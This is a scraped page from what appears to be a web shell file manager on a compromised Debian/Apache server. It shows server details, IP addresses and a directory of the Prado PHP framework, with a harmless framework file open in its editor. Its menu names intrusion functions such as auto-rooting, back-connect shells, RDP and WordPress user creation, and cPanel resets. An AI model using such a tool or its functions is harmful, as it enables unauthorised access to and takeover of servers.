Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 18.217.14.208
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
ifk /
web /
prado4.3.2 /
Shell /
Actions /
[ HOME SHELL ]
Name
Size
Permission
Action
TActiveRecordAction.php
8
KB
-rw-r--r--
TDbParameterAction.php
4.98
KB
-rw-r--r--
TFlushCachesAction.php
3.47
KB
-rw-r--r--
THelpAction.php
1.34
KB
-rw-r--r--
TPhpShellAction.php
1.1
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : TPhpShellAction.php
<?php /** * TPhpShellAction class file * * @author Brad Anderson <belisoful@icloud.com> * @link https://github.com/pradosoft/prado * @license https://github.com/pradosoft/prado/blob/master/LICENSE */ namespace Prado\Shell\Actions; use Prado\Prado; use Prado\Shell\TShellAction; /** * Creates and run a Prado application in a PHP Shell. * * @author Brad Anderson <belisoful[at]icloud[dot]com> shell refactor * @author Wei Zhuo <weizhuo[at]gmail[dot]com> * @since 3.0.5 */ class TPhpShellAction extends TShellAction { protected $action = 'shell'; protected $methods = ['index']; protected $parameters = [null]; protected $optional = [null]; protected $description = [ 'Provides PHP Interactive Shell Interpreter.', 'Runs a PHP interactive interpreter after Initializing the Prado application.']; /** * This runs the interactive PHP Shell * @param array $args parameters * @return bool */ public function actionIndex($args) { $this->getWriter()->flush(); $app = Prado::getApplication(); $shell = new \Psy\Shell(); $shell->setBoundObject($app); $shell->run(); return true; } }
Close